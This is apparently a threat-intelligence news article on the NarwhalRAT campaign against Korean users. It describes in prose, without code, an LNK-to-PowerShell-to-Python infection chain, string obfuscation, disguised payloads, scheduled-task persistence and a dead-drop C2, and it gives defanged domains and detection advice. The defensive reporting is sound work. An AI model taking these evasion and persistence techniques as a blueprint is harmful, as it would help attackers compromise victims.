Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy

Korean users are currently facing a sophisticated malware campaign. This stealthy operation leverages a meticulously crafted chain of deception to deploy its malicious payload.

Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.

The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.”

The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document.

Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.

Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea.

The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight.

It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.

The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder.

NarwhalRAT Loader Attack

When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment variable substring substitution to hide the real commands, dynamically rebuilding strings like “powershell” and “curl.exe” at runtime to evade static detection.

After deobfuscation, the LNK file launches PowerShell with execution policy bypassed and uses a copied curl.exe to download two files from the relay server.

The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window.

This technique of abusing built-in tools is classified as Living-off-the-Land. The batch file downloads the official Python embedded package to make the activity look like a normal software installation.

It renames Pythonw.exe to usersscreen.exe to suppress any console window. The final payload, config.cat, is disguised with a .cat extension to resemble a Windows security catalog, though it is actually compiled Python bytecode acting as a backdoor loader.

For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” running at one-minute intervals. This name mimics a legitimate Microsoft task, making it hard for administrators to spot during inspection.

A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload.

NarwhalRAT Capabilities and C2 Communication

Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware.

The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes.

Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances.

From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell.

Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.